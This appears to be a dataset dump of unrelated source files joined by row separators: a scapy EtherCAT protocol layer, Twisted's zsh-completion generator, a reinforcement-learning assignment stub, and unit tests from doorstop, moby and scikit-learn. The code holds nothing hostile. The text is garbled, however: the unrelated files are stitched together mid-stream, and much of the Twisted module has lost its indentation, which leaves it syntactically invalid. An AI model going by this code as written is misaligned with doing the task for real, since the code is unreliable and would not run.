        0x09: EtherCatBRW,
        0x0c: EtherCatLRW,
        0x0d: EtherCatARMW,
        0x0e: EtherCatFRMW
    }

    def post_build(self, pkt, pay):
        """
        need to set the length of the whole PDU manually
        to avoid any bit fiddling use a dummy class to build the layer content

        also add padding if frame is < 64 bytes

        Note: padding only handles Ether/n*Dot1Q/EtherCat
              (no special mumbo jumbo)

        :param pkt: raw string containing the current layer
        :param pay: raw string containing the payload
        :return: <new current layer> + payload
        """

        class _EtherCatLengthCalc(Packet):
            """
            dummy class used to generate str representation easily
            """
            fields_desc = [
                LEBitField('length', None, 11),
                LEBitField('_reserved', 0, 1),
                LEBitField('type', 0, 4),
            ]

        payload_len = len(pay)
        # length field is 11 bit
        if payload_len > 2047:
            raise ValueError('payload size {} exceeds maximum length {} '
                             'of EtherCat message.'.format(payload_len, 2047))
        self.length = payload_len
        vlan_headers_total_size = 0
        upper_layer = self.underlayer
        # add size occupied by VLAN tags
        while upper_layer and isinstance(upper_layer, Dot1Q):
            vlan_headers_total_size += 4
            upper_layer = upper_layer.underlayer
        if not isinstance(upper_layer, Ether):
            raise Exception('missing Ether layer')
        # pad the frame up to the Ethernet minimum of 64 bytes (FCS included)
        pad_len = EtherCat.ETHER_FRAME_MIN_LEN - (EtherCat.ETHER_HEADER_LEN +
                                                  vlan_headers_total_size +
                                                  EtherCat.ETHERCAT_HEADER_LEN +  # noqa: E501
                                                  payload_len +
                                                  EtherCat.ETHER_FSC_LEN)
        if pad_len > 0:
            pad = Padding()
            pad.load = b'\x00' * pad_len
            return raw(_EtherCatLengthCalc(length=self.length,
                                           type=self.type)) + pay + raw(pad)
        return raw(_EtherCatLengthCalc(length=self.length,
                                       type=self.type)) + pay

    def guess_payload_class(self, payload):
        # first payload byte selects the DLPDU layer
        try:
            dlpdu_type = payload[0]
            return EtherCat.ETHERCAT_TYPE12_DLPDU_TYPES[dlpdu_type]
        except KeyError:
            log_runtime.error(
                '{}.guess_payload_class() - unknown or invalid '
                'DLPDU type'.format(self.__class__.__name__))
            return Packet.guess_payload_class(self, payload)
# layer bindings: EtherCat is carried directly over Ethernet (or behind a
# VLAN tag) with EtherType 0x88a4.
# NOTE: the last binding line carried stray non-Python residue in the
# original source; it is removed here so the module parses cleanly.
bind_layers(Ether, EtherCat, type=0x88a4)
bind_layers(Dot1Q, EtherCat, type=0x88a4)

# bindings for DLPDUs
bind_layers(EtherCat, EtherCatAPRD, type=0x01)
bind_layers(EtherCat, EtherCatFPRD, type=0x01)
bind_layers(EtherCat, EtherCatBRD, type=0x01)
bind_layers(EtherCat, EtherCatLRD, type=0x01)
bind_layers(EtherCat, EtherCatAPWR, type=0x01)
bind_layers(EtherCat, EtherCatFPWR, type=0x01)
bind_layers(EtherCat, EtherCatBWR, type=0x01)
bind_layers(EtherCat, EtherCatLWR, type=0x01)
bind_layers(EtherCat, EtherCatAPRW, type=0x01)
bind_layers(EtherCat, EtherCatFPRW, type=0x01)
bind_layers(EtherCat, EtherCatBRW, type=0x01)
bind_layers(EtherCat, EtherCatLRW, type=0x01)
bind_layers(EtherCat, EtherCatARMW, type=0x01)
bind_layers(EtherCat, EtherCatFRMW, type=0x01)
# -*- test-case-name: twisted.test.test_zshcomp -*-
# Copyright (c) 2006 Twisted Matrix Laboratories.
# See LICENSE for details.
"""
Rebuild the completion functions for the currently active version of Twisted::
$ python zshcomp.py -i
This module implements a zsh code generator which generates completion code for
commands that use twisted.python.usage. This is the stuff that makes pressing
Tab at the command line work.
Maintainer: Eric Mangold
To build completion functions for your own commands, and not Twisted commands,
then just do something like this::
o = mymodule.MyOptions()
f = file('_mycommand', 'w')
Builder("mycommand", o, f).write()
Then all you have to do is place the generated file somewhere in your
C{$fpath}, and restart zsh. Note the "site-functions" directory in your
C{$fpath} where you may install 3rd-party completion functions (like the one
you're building). Call C{siteFunctionsPath} to locate this directory
programmatically.
SPECIAL CLASS VARIABLES. You may set these on your usage.Options subclass::
zsh_altArgDescr
zsh_multiUse
zsh_mutuallyExclusive
zsh_actions
zsh_actionDescr
zsh_extras
Here is what they mean (with examples)::
zsh_altArgDescr = {"foo":"use this description for foo instead"}
A dict mapping long option names to alternate descriptions. When this
variable is present, the descriptions contained here will override
those descriptions provided in the optFlags and optParameters
variables.
zsh_multiUse = ["foo", "bar"]
A sequence containing those long option names which may appear on the
command line more than once. By default, options will only be completed
one time.
zsh_mutuallyExclusive = [("foo", "bar"), ("bar", "baz")]
A sequence of sequences, with each sub-sequence containing those long
option names that are mutually exclusive. That is, those options that
cannot appear on the command line together.
zsh_actions = {"foo":'_files -g "*.foo"', "bar":"(one two three)",
"colors":"_values -s , 'colors to use' red green blue"}
A dict mapping long option names to Zsh "actions". These actions
define what will be completed as the argument to the given option. By
default, all files/dirs will be completed if no action is given.
Callables may instead be given for the values in this dict. The
callable should accept no arguments, and return a string that will be
used as the zsh "action" in the same way as the literal strings in the
examples above.
As you can see in the example above. The "foo" option will have files
that end in .foo completed when the user presses Tab. The "bar"
option will have either of the strings "one", "two", or "three"
completed when the user presses Tab.
"colors" will allow multiple arguments to be completed, separated by
commas. The possible arguments are red, green, and blue. Examples::
my_command --foo some-file.foo --colors=red,green
my_command --colors=green
my_command --colors=green,blue
Actions may take many forms, and it is beyond the scope of this
document to illustrate them all. Please refer to the documentation for
the Zsh _arguments function. zshcomp is basically a front-end to Zsh's
_arguments completion function.
That documentation is available on the zsh web site at this URL:
U{http://zsh.sunsite.dk/Doc/Release/zsh_19.html#SEC124}
zsh_actionDescr = {"logfile":"log file name", "random":"random seed"}
A dict mapping long option names to a description for the corresponding
zsh "action". These descriptions are show above the generated matches
when the user is doing completions for this option.
Normally Zsh does not show these descriptions unless you have
"verbose" completion turned on. Turn on verbosity with this in your
~/.zshrc::
zstyle ':completion:*' verbose yes
zstyle ':completion:*:descriptions' format '%B%d%b'
zsh_extras = [":file to read from:action", ":file to write to:action"]
A sequence of extra arguments that will be passed verbatim to Zsh's
_arguments completion function. The _arguments function does all the
hard work of doing command line completions. You can see how zshcomp
invokes the _arguments call by looking at the generated completion
files that this module creates.
*** NOTE ***
You will need to use this variable to describe completions for normal
command line arguments. That is, those arguments that are not
associated with an option. That is, the arguments that are given to the
parseArgs method of your usage.Options subclass.
In the example above, the 1st non-option argument will be described as
"file to read from" and completion options will be generated in
accordance with the "action". (See above about zsh "actions") The
2nd non-option argument will be described as "file to write to" and
the action will be interpreted likewise.
Things you can put here are all documented under the _arguments
function here: U{http://zsh.sunsite.dk/Doc/Release/zsh_19.html#SEC124}
Zsh Notes:
To enable advanced completion add something like this to your ~/.zshrc::
autoload -U compinit
compinit
For some extra verbosity, and general niceness add these lines too::
zstyle ':completion:*' verbose yes
zstyle ':completion:*:descriptions' format '%B%d%b'
zstyle ':completion:*:messages' format '%d'
zstyle ':completion:*:warnings' format 'No matches for: %d'
Have fun!
"""
import itertools, sys, commands, os.path
from twisted.python import reflect, util, usage
from twisted.scripts.mktap import IServiceMaker
class MyOptions(usage.Options):
    """
    Command-line options accepted by this script
    """
    longdesc = ""
    synopsis = "Usage: python zshcomp.py [--install | -i] | <output directory>"
    optFlags = [["install", "i",
                 'Output files to the "installation" directory ' \
                 '(twisted/python/zsh in the currently active ' \
                 'Twisted package)']]
    optParameters = [["directory", "d", None,
                      "Output files to this directory"]]

    def postOptions(self):
        # --install and --directory are mutually exclusive, and one of
        # them is required; --directory must name an existing directory.
        if self['install'] and self['directory']:
            raise usage.UsageError("Can't have --install and "
                                   "--directory at the same time")
        if not self['install'] and not self['directory']:
            raise usage.UsageError("Not enough arguments")
        if self['directory'] and not os.path.isdir(self['directory']):
            raise usage.UsageError("%s is not a directory" % self['directory'])
class Builder:
    """
    Generates a zsh completion function for a single command that has no
    sub-commands.
    """
    def __init__(self, cmd_name, options, file):
        """
        @type cmd_name: C{str}
        @param cmd_name: The name of the command
        @type options: C{twisted.usage.Options}
        @param options: The C{twisted.usage.Options} instance defined for
                        this command
        @type file: C{file}
        @param file: The C{file} to write the completion function to
        """
        self.cmd_name = cmd_name
        self.options = options
        self.file = file

    def write(self):
        """
        Write the completion function to the file given to __init__
        @return: C{None}
        """
        # a plain command is completed by a single _arguments call
        self.file.write('#compdef %s\n' % (self.cmd_name,))
        ArgumentsGenerator(self.cmd_name, self.options, self.file).write()
class SubcommandBuilder(Builder):
    """
    Use this builder for commands that have sub-commands. twisted.python.usage
    has the notion of sub-commands that are defined using an entirely separate
    Options class.
    """
    # subclasses set these: the plugin interface to enumerate sub-commands
    # from, and the label shown to the user while completing a sub-command
    interface = None
    subcmdLabel = None

    def write(self):
        """
        Write the completion function to the file given to __init__
        @return: C{None}
        """
        self.file.write('#compdef %s\n' % (self.cmd_name,))
        # emit a zsh array of "name:description" pairs, one per plugin
        self.file.write('local _zsh_subcmds_array\n_zsh_subcmds_array=(\n')
        from twisted import plugin as newplugin
        plugins = newplugin.getPlugins(self.interface)
        for p in plugins:
            self.file.write('"%s:%s"\n' % (p.tapname, p.description))
        self.file.write(")\n\n")

        # the top-level command completes its own options plus a sub-command
        self.options.__class__.zsh_extras = ['*::subcmd:->subcmd']
        gen = ArgumentsGenerator(self.cmd_name, self.options, self.file)
        gen.write()

        # dispatch: first word completes the sub-command name, later words
        # are completed by the per-plugin _arguments call below
        self.file.write("""if (( CURRENT == 1 )); then
  _describe "%s" _zsh_subcmds_array && ret=0
fi

(( ret )) || return 0

service="$words[1]"

case $service in\n""" % (self.subcmdLabel,))

        plugins = newplugin.getPlugins(self.interface)
        for p in plugins:
            self.file.write(p.tapname + ")\n")
            gen = ArgumentsGenerator(p.tapname, p.options(), self.file)
            gen.write()
            self.file.write(";;\n")
        self.file.write("*) _message \"don't know how to" \
                        " complete $service\";;\nesac")
class MktapBuilder(SubcommandBuilder):
    """
    Builder for the mktap command
    """
    # enumerate taps via the IServiceMaker plugin interface
    interface = IServiceMaker
    subcmdLabel = 'tap to build'
class TwistdBuilder(SubcommandBuilder):
    """
    Builder for the twistd command
    """
    # twistd runs the same IServiceMaker plugins that mktap builds
    interface = IServiceMaker
    subcmdLabel = 'service to run'
class ArgumentsGenerator:
"""
Generate a call to the zsh _arguments completion function
based on data in a usage.Options subclass
"""
    def __init__(self, cmd_name, options, file):
        """
        @type cmd_name: C{str}
        @param cmd_name: The name of the command
        @type options: C{twisted.usage.Options}
        @param options: The C{twisted.usage.Options} instance defined
                        for this command
        @type file: C{file}
        @param file: The C{file} to write the completion function to
        """
        self.cmd_name = cmd_name
        self.options = options
        self.file = file

        self.altArgDescr = {}
        self.actionDescr = {}
        self.multiUse = []
        self.mutuallyExclusive = []
        self.actions = {}
        self.extras = []

        # collect the zsh_* metadata declared on the Options class (and
        # its base classes) into the attributes initialised above
        aCL = reflect.accumulateClassList
        aCD = reflect.accumulateClassDict

        aCD(options.__class__, 'zsh_altArgDescr', self.altArgDescr)
        aCD(options.__class__, 'zsh_actionDescr', self.actionDescr)
        aCL(options.__class__, 'zsh_multiUse', self.multiUse)
        aCL(options.__class__, 'zsh_mutuallyExclusive',
            self.mutuallyExclusive)
        aCD(options.__class__, 'zsh_actions', self.actions)
        aCL(options.__class__, 'zsh_extras', self.extras)

        optFlags = []
        optParams = []

        aCL(options.__class__, 'optFlags', optFlags)
        aCL(options.__class__, 'optParameters', optParams)

        # normalise short option specs to fixed length
        # (flags: [long, short, descr]; params: [long, short, default, descr])
        for i, optList in enumerate(optFlags):
            if len(optList) != 3:
                optFlags[i] = util.padTo(3, optList)

        for i, optList in enumerate(optParams):
            if len(optList) != 4:
                optParams[i] = util.padTo(4, optList)

        self.optFlags = optFlags
        self.optParams = optParams

        # index both kinds of options by their long name for quick lookup
        optParams_d = {}
        for optList in optParams:
            optParams_d[optList[0]] = optList[1:]
        self.optParams_d = optParams_d

        optFlags_d = {}
        for optList in optFlags:
            optFlags_d[optList[0]] = optList[1:]
        self.optFlags_d = optFlags_d

        optAll_d = {}
        optAll_d.update(optParams_d)
        optAll_d.update(optFlags_d)
        self.optAll_d = optAll_d

        self.addAdditionalOptions()

        # makes sure none of the zsh_ data structures reference option
        # names that don't exist. (great for catching typos)
        self.verifyZshNames()

        self.excludes = self.makeExcludesDict()
def write(self):
"""
Write the zsh completion code to the file given to __init__
@return: C{None}
"""
self.writeHeader()
self.writeExtras()
self.writeOptions()
self.writeFooter()
def writeHeader(self):
"""
This is the start of the code that calls _arguments
@return: C{None}
"""
self.file.write('_arguments -s -A "-*" \\\n')
def writeOptions(self):
"""
Write out zsh code for each option in this command
@return: C{None}
"""
optNames = self.optAll_d.keys()
optNames.sort()
for long in optNames:
self.writeOpt(long)
def writeExtras(self):
"""
Write out the "extras" list. These are just passed verbatim to the
_arguments call
@return: C{None}
"""
for s in self.extras:
self.file.write(escape(s))
self.file.write(' \\\n')
def writeFooter(self):
"""
Write the last bit of code that finishes the call to _arguments
@return: C{None}
"""
self.file.write('&& return 0\n')
def verifyZshNames(self):
"""
Ensure that none of the names given in zsh_* variables are typoed
@return: C{None}
@raise ValueError: Raised if unknown option names have been given in
zsh_* variables
"""
def err(name):
raise ValueError, "Unknown option name \"%s\" found while\n" \
"examining zsh_ attributes for the %s command" % (
name, self.cmd_name)
for name in itertools.chain(self.altArgDescr, self.actionDescr,
self.actions, self.multiUse):
if name not in self.optAll_d:
err(name)
for seq in self.mutuallyExclusive:
for name in seq:
if name not in self.optAll_d:
err(name)
def excludeStr(self, long, buildShort=False):
"""
Generate an "exclusion string" for the given option
@type long: C{str}
@param long: The long name of the option
(i.e. "verbose" instead of "v")
@type buildShort: C{bool}
@param buildShort: May be True to indicate we're building an excludes
string for the short option that correspondes to
the given long opt
@return: The generated C{str}
"""
if long in self.excludes:
exclusions = self.excludes[long][:]
else:
exclusions = []
# if long isn't a multiUse option (can't appear on the cmd line more
# than once), then we have to exclude the short option if we're
# building for the long option, and vice versa.
if long not in self.multiUse:
if buildShort is False:
short = self.getShortOption(long)
if short is not None:
exclusions.append(short)
else:
exclusions.append(long)
if not exclusions:
return ''
strings = []
for optName in exclusions:
if len(optName) == 1:
# short option
strings.append("-" + optName)
else:
strings.append("--" + optName)
return "(%s)" % " ".join(strings)
def makeExcludesDict(self):
"""
@return: A C{dict} that maps each option name appearing in
self.mutuallyExclusive to a list of those option names that
is it mutually exclusive with (can't appear on the cmd line with)
"""
#create a mapping of long option name -> single character name
longToShort = {}
for optList in itertools.chain(self.optParams, self.optFlags):
try:
if optList[1] != None:
longToShort[optList[0]] = optList[1]
except IndexError:
pass
excludes = {}
for lst in self.mutuallyExclusive:
for i, long in enumerate(lst):
tmp = []
tmp.extend(lst[:i])
tmp.extend(lst[i+1:])
for name in tmp[:]:
if name in longToShort:
tmp.append(longToShort[name])
if long in excludes:
excludes[long].extend(tmp)
else:
excludes[long] = tmp
return excludes
def writeOpt(self, long):
"""
Write out the zsh code for the given argument. This is just part of the
one big call to _arguments
@type long: C{str}
@param long: The long name of the option
(i.e. "verbose" instead of "v")
@return: C{None}
"""
if long in self.optFlags_d:
# It's a flag option. Not one that takes a parameter.
long_field = "--%s" % long
else:
long_field = "--%s=" % long
short = self.getShortOption(long)
if short != None:
short_field = "-" + short
else:
short_field = ''
descr = self.getDescription(long)
descr_field = descr.replace("[", "\[")
descr_field = descr_field.replace("]", "\]")
descr_field = '[%s]' % descr_field
if long in self.actionDescr:
actionDescr_field = self.actionDescr[long]
else:
actionDescr_field = descr
action_field = self.getAction(long)
if long in self.multiUse:
multi_field = '*'
else:
multi_field = ''
longExclusions_field = self.excludeStr(long)
if short:
#we have to write an extra line for the short option if we have one
shortExclusions_field = self.excludeStr(long, buildShort=True)
self.file.write(escape('%s%s%s%s%s' % (shortExclusions_field,
multi_field, short_field, descr_field, action_field)))
self.file.write(' \\\n')
self.file.write(escape('%s%s%s%s%s' % (longExclusions_field,
multi_field, long_field, descr_field, action_field)))
self.file.write(' \\\n')
def getAction(self, long):
"""
Return a zsh "action" string for the given argument
@return: C{str}
"""
if long in self.actions:
if callable(self.actions[long]):
action = self.actions[long]()
else:
action = self.actions[long]
return ":%s:%s" % (self.getActionDescr(long), action)
if long in self.optParams_d:
return ':%s:_files' % self.getActionDescr(long)
return ''
def getActionDescr(self, long):
"""
Return the description to be used when this argument is completed
@return: C{str}
"""
if long in self.actionDescr:
return self.actionDescr[long]
else:
return long
def getDescription(self, long):
"""
Return the description to be used for this argument
@return: C{str}
"""
#check if we have an alternate descr for this arg, and if so use it
if long in self.altArgDescr:
return self.altArgDescr[long]
#otherwise we have to get it from the optFlags or optParams
try:
descr = self.optFlags_d[long][1]
except KeyError:
try:
descr = self.optParams_d[long][2]
except KeyError:
descr = None
if descr is not None:
return descr
# lets try to get it from the opt_foo method doc string if there is one
longMangled = long.replace('-', '_') # this is what t.p.usage does
obj = getattr(self.options, 'opt_%s' % longMangled, None)
if obj:
descr = descrFromDoc(obj)
if descr is not None:
return descr
return long # we really ought to have a good description to use
def getShortOption(self, long):
"""
Return the short option letter or None
@return: C{str} or C{None}
"""
optList = self.optAll_d[long]
try:
return optList[0] or None
except IndexError:
pass
def addAdditionalOptions(self):
"""
Add additional options to the optFlags and optParams lists.
These will be defined by 'opt_foo' methods of the Options subclass
@return: C{None}
"""
methodsDict = {}
reflect.accumulateMethods(self.options, methodsDict, 'opt_')
methodToShort = {}
for name in methodsDict.copy():
if len(name) == 1:
methodToShort[methodsDict[name]] = name
del methodsDict[name]
for methodName, methodObj in methodsDict.items():
long = methodName.replace('_', '-') # t.p.usage does this
# if this option is already defined by the optFlags or
# optParameters then we don't want to override that data
if long in self.optAll_d:
continue
descr = self.getDescription(long)
short = None
if methodObj in methodToShort:
short = methodToShort[methodObj]
reqArgs = methodObj.im_func.func_code.co_argcount
if reqArgs == 2:
self.optParams.append([long, short, None, descr])
self.optParams_d[long] = [short, None, descr]
self.optAll_d[long] = [short, None, descr]
elif reqArgs == 1:
self.optFlags.append([long, short, descr])
self.optFlags_d[long] = [short, descr]
self.optAll_d[long] = [short, None, descr]
else:
raise TypeError, '%r has wrong number ' \
'of arguments' % (methodObj,)
def descrFromDoc(obj):
"""
Generate an appropriate description from docstring of the given object
"""
if obj.__doc__ is None:
return None
lines = obj.__doc__.split("\n")
descr = None
try:
if lines[0] != "" and not lines[0].isspace():
descr = lines[0].lstrip()
# skip first line if it's blank
elif lines[1] != "" and not lines[1].isspace():
descr = lines[1].lstrip()
except IndexError:
pass
return descr
def firstLine(s):
"""
Return the first line of the given string
"""
try:
i = s.index('\n')
return s[:i]
except ValueError:
return s
def escape(str):
"""
Shell escape the given string
"""
return commands.mkarg(str)[1:]
def siteFunctionsPath():
"""
Return the path to the system-wide site-functions directory or
C{None} if it cannot be determined
"""
try:
cmd = "zsh -f -c 'echo ${(M)fpath:#/*/site-functions}'"
output = commands.getoutput(cmd)
if os.path.isdir(output):
return output
except:
pass
generateFor = [('conch', 'twisted.conch.scripts.conch', 'ClientOptions'),
('mktap', 'twisted.scripts.mktap', 'FirstPassOptions'),
('trial', 'twisted.scripts.trial', 'Options'),
('cftp', 'twisted.conch.scripts.cftp', 'ClientOptions'),
('tapconvert', 'twisted.scripts.tapconvert', 'ConvertOptions'),
('twistd', 'twisted.scripts.twistd', 'ServerOptions'),
('ckeygen', 'twisted.conch.scripts.ckeygen', 'GeneralOptions'),
('lore', 'twisted.lore.scripts.lore', 'Options'),
('pyhtmlizer', 'twisted.scripts.htmlizer', 'Options'),
('tap2deb', 'twisted.scripts.tap2deb', 'MyOptions'),
('tkconch', 'twisted.conch.scripts.tkconch', 'GeneralOptions'),
('manhole', 'twisted.scripts.manhole', 'MyOptions'),
('tap2rpm', 'twisted.scripts.tap2rpm', 'MyOptions'),
('websetroot', None, None),
('tkmktap', None, None),
]
# NOTE: the commands using None above are no longer included in Twisted.
# However due to limitations in zsh's completion system the version of
# _twisted_zsh_stub shipped with zsh contains a static list of Twisted's
# commands. It will display errors if completion functions for these missing
# commands are not found :( So we just include dummy (empty) completion
# function files
specialBuilders = {'mktap' : MktapBuilder,
'twistd' : TwistdBuilder}
def makeCompFunctionFiles(out_path, generateFor=generateFor,
specialBuilders=specialBuilders):
"""
Generate completion function files in the given directory for all
twisted commands
@type out_path: C{str}
@param out_path: The path to the directory to generate completion function
fils in
@param generateFor: Sequence in the form of the 'generateFor' top-level
variable as defined in this module. Indicates what
commands to build completion files for.
@param specialBuilders: Sequence in the form of the 'specialBuilders'
top-level variable as defined in this module.
Indicates what commands require a special
Builder class.
@return: C{list} of 2-tuples of the form (cmd_name, error) indicating
commands that we skipped building completions for. cmd_name
is the name of the skipped command, and error is the Exception
that was raised when trying to import the script module.
Commands are usually skipped due to a missing dependency,
e.g. Tkinter.
"""
skips = []
for cmd_name, module_name, class_name in generateFor:
if module_name is None:
# create empty file
f = _openCmdFile(out_path, cmd_name)
f.close()
continue
try:
m = __import__('%s' % (module_name,), None, None, (class_name))
f = _openCmdFile(out_path, cmd_name)
o = getattr(m, class_name)() # instantiate Options class
if cmd_name in specialBuilders:
b = specialBuilders[cmd_name](cmd_name, o, f)
b.write()
else:
b = Builder(cmd_name, o, f)
b.write()
except Exception, e:
skips.append( (cmd_name, e) )
continue
return skips
def _openCmdFile(out_path, cmd_name):
return file(os.path.join(out_path, '_'+cmd_name), 'w')
def run():
options = MyOptions()
try:
options.parseOptions(sys.argv[1:])
except usage.UsageError, e:
print e
print options.getUsage()
sys.exit(2)
if options['install']:
import twisted
dir = os.path.join(os.path.dirname(twisted.__file__), "python", "zsh")
skips = makeCompFunctionFiles(dir)
else:
skips = makeCompFunctionFiles(options['directory'])
for cmd_name, error in skips:
sys.stderr.write("zshcomp: Skipped building for %s. Script module " \
"could not be imported:\n" % (cmd_name,))
sys.stderr.write(str(error)+'\n')
if skips:
sys.exit(3)
if __name__ == '__main__':
run() | unknown | codeparrot/codeparrot-clean | ||
import mdp, util
from learningAgents import ValueEstimationAgent
class ValueIterationAgent(ValueEstimationAgent):
"""
* Please read learningAgents.py before reading this.*
A ValueIterationAgent takes a Markov decision process
(see mdp.py) on initialization and runs value iteration
for a given number of iterations using the supplied
discount factor.
"""
def __init__(self, mdp, discount = 0.9, iterations = 100):
"""
Your value iteration agent should take an mdp on
construction, run the indicated number of iterations
and then act according to the resulting policy.
Some useful mdp methods you will use:
mdp.getStates()
mdp.getPossibleActions(state)
mdp.getTransitionStatesAndProbs(state, action)
mdp.getReward(state, action, nextState)
"""
self.mdp = mdp
self.discount = discount
self.iterations = iterations
self.values = util.Counter() # A Counter is a dict with default 0
"*** YOUR CODE HERE ***"
def getValue(self, state):
"""
Return the value of the state (computed in __init__).
"""
return self.values[state]
def getQValue(self, state, action):
"""
The q-value of the state action pair
(after the indicated number of value iteration
passes). Note that value iteration does not
necessarily create this quantity and you may have
to derive it on the fly.
"""
"*** YOUR CODE HERE ***"
util.raiseNotDefined()
def getPolicy(self, state):
"""
The policy is the best action in the given state
according to the values computed by value iteration.
You may break ties any way you see fit. Note that if
there are no legal actions, which is the case at the
terminal state, you should return None.
"""
"*** YOUR CODE HERE ***"
util.raiseNotDefined()
def getAction(self, state):
"Returns the policy at the state (no exploration)."
return self.getPolicy(state) | unknown | codeparrot/codeparrot-clean | ||
"""Unit tests for the doorstop.vcs.base module."""
import unittest
from unittest.mock import patch
from doorstop.core.vcs.base import BaseWorkingCopy
class SampleWorkingCopy(BaseWorkingCopy):
"""Sample WorkingCopy implementation."""
def __init__(self, path):
super().__init__(path)
self._ignores_cache = ["*build*", "ignored.*", "*published*"]
def lock(self, *args, **kwargs):
pass # no implementation
def edit(self, *args, **kwargs):
pass # no implementation
def add(self, *args, **kwargs):
pass # no implementation
def delete(self, *args, **kwargs):
pass # no implementation
def commit(self, *args, **kwargs):
pass # no implementation
class TestSampleWorkingCopy(unittest.TestCase):
"""Tests for the doorstop.vcs.base module."""
def setUp(self):
self.wc = SampleWorkingCopy(None)
@patch('os.environ', {})
def test_ignored(self):
"""Verify ignored paths are detected."""
self.assertTrue(self.wc.ignored("ignored.txt"))
self.assertFalse(self.wc.ignored("not_ignored.txt"))
self.assertTrue(self.wc.ignored("path/to/published.html"))
self.assertTrue(self.wc.ignored("build/path/to/anything"))
@patch('os.environ', {'CI': 'true'})
def test_ignored_on_ci(self):
"""Verify the build directory is not ignored during CI."""
self.assertTrue(self.wc.ignored("ignored.txt"))
self.assertFalse(self.wc.ignored("not_ignored.txt"))
self.assertTrue(self.wc.ignored("path/to/published.html"))
self.assertFalse(self.wc.ignored("build/path/to/anything")) | unknown | codeparrot/codeparrot-clean | ||
package client
import (
"net/http"
"testing"
cerrdefs "github.com/containerd/errdefs"
"github.com/moby/moby/api/types/image"
ocispec "github.com/opencontainers/image-spec/specs-go/v1"
"gotest.tools/v3/assert"
is "gotest.tools/v3/assert/cmp"
)
func TestImageHistoryError(t *testing.T) {
client, err := New(WithMockClient(errorMock(http.StatusInternalServerError, "Server error")))
assert.NilError(t, err)
_, err = client.ImageHistory(t.Context(), "nothing")
assert.Check(t, is.ErrorType(err, cerrdefs.IsInternal))
}
func TestImageHistory(t *testing.T) {
const (
expectedURL = "/images/image_id/history"
historyResponse = `[{"Comment":"","Created":0,"CreatedBy":"","Id":"image_id1","Size":0,"Tags":["tag1","tag2"]},{"Comment":"","Created":0,"CreatedBy":"","Id":"image_id2","Size":0,"Tags":["tag1","tag2"]}]`
expectedPlatform = `{"architecture":"arm64","os":"linux","variant":"v8"}`
)
client, err := New(WithMockClient(func(req *http.Request) (*http.Response, error) {
assert.Check(t, assertRequest(req, http.MethodGet, expectedURL))
assert.Check(t, is.Equal(req.URL.Query().Get("platform"), expectedPlatform))
return mockResponse(http.StatusOK, nil, historyResponse)(req)
}))
assert.NilError(t, err)
expected := ImageHistoryResult{
Items: []image.HistoryResponseItem{
{
ID: "image_id1",
Tags: []string{"tag1", "tag2"},
},
{
ID: "image_id2",
Tags: []string{"tag1", "tag2"},
},
},
}
imageHistories, err := client.ImageHistory(t.Context(), "image_id", ImageHistoryWithPlatform(ocispec.Platform{
Architecture: "arm64",
OS: "linux",
Variant: "v8",
}))
assert.NilError(t, err)
assert.Check(t, is.DeepEqual(imageHistories, expected))
} | go | github | https://github.com/moby/moby | client/image_history_test.go |
import numpy as np
import numpy.linalg as la
import scipy.sparse as sp
from sklearn.utils.testing import assert_almost_equal
from sklearn.utils.testing import assert_array_almost_equal
from sklearn.utils.testing import assert_array_equal
from sklearn.utils.testing import assert_equal
from sklearn.utils.testing import assert_raises
from sklearn.utils.testing import assert_true
from sklearn.utils.testing import assert_false
from sklearn.utils.sparsefuncs import mean_variance_axis0
from sklearn.preprocessing import Binarizer
from sklearn.preprocessing import KernelCenterer
from sklearn.preprocessing import LabelBinarizer
from sklearn.preprocessing import LabelEncoder
from sklearn.preprocessing import Normalizer
from sklearn.preprocessing import normalize
from sklearn.preprocessing import StandardScaler
from sklearn.preprocessing import scale
from sklearn.preprocessing import MinMaxScaler
from sklearn import datasets
from sklearn.linear_model.stochastic_gradient import SGDClassifier
iris = datasets.load_iris()
def toarray(a):
if hasattr(a, "toarray"):
a = a.toarray()
return a
def test_scaler_1d():
"""Test scaling of dataset along single axis"""
rng = np.random.RandomState(0)
X = rng.randn(5)
X_orig_copy = X.copy()
scaler = StandardScaler()
X_scaled = scaler.fit(X).transform(X, copy=False)
assert_array_almost_equal(X_scaled.mean(axis=0), 0.0)
assert_array_almost_equal(X_scaled.std(axis=0), 1.0)
# check inverse transform
X_scaled_back = scaler.inverse_transform(X_scaled)
assert_array_almost_equal(X_scaled_back, X_orig_copy)
# Test with 1D list
X = [0., 1., 2, 0.4, 1.]
scaler = StandardScaler()
X_scaled = scaler.fit(X).transform(X, copy=False)
assert_array_almost_equal(X_scaled.mean(axis=0), 0.0)
assert_array_almost_equal(X_scaled.std(axis=0), 1.0)
X_scaled = scale(X)
assert_array_almost_equal(X_scaled.mean(axis=0), 0.0)
assert_array_almost_equal(X_scaled.std(axis=0), 1.0)
def test_scaler_2d_arrays():
"""Test scaling of 2d array along first axis"""
rng = np.random.RandomState(0)
X = rng.randn(4, 5)
X[:, 0] = 0.0 # first feature is always of zero
scaler = StandardScaler()
X_scaled = scaler.fit(X).transform(X, copy=True)
assert_false(np.any(np.isnan(X_scaled)))
assert_array_almost_equal(X_scaled.mean(axis=0), 5 * [0.0])
assert_array_almost_equal(X_scaled.std(axis=0), [0., 1., 1., 1., 1.])
# Check that X has not been copied
assert_true(X_scaled is not X)
# check inverse transform
X_scaled_back = scaler.inverse_transform(X_scaled)
assert_true(X_scaled_back is not X)
assert_true(X_scaled_back is not X_scaled)
assert_array_almost_equal(X_scaled_back, X)
X_scaled = scale(X, axis=1, with_std=False)
assert_false(np.any(np.isnan(X_scaled)))
assert_array_almost_equal(X_scaled.mean(axis=1), 4 * [0.0])
X_scaled = scale(X, axis=1, with_std=True)
assert_false(np.any(np.isnan(X_scaled)))
assert_array_almost_equal(X_scaled.mean(axis=1), 4 * [0.0])
assert_array_almost_equal(X_scaled.std(axis=1), 4 * [1.0])
# Check that the data hasn't been modified
assert_true(X_scaled is not X)
X_scaled = scaler.fit(X).transform(X, copy=False)
assert_false(np.any(np.isnan(X_scaled)))
assert_array_almost_equal(X_scaled.mean(axis=0), 5 * [0.0])
assert_array_almost_equal(X_scaled.std(axis=0), [0., 1., 1., 1., 1.])
# Check that X has not been copied
assert_true(X_scaled is X)
X = rng.randn(4, 5)
X[:, 0] = 1.0 # first feature is a constant, non zero feature
scaler = StandardScaler()
X_scaled = scaler.fit(X).transform(X, copy=True)
assert_false(np.any(np.isnan(X_scaled)))
assert_array_almost_equal(X_scaled.mean(axis=0), 5 * [0.0])
assert_array_almost_equal(X_scaled.std(axis=0), [0., 1., 1., 1., 1.])
# Check that X has not been copied
assert_true(X_scaled is not X)
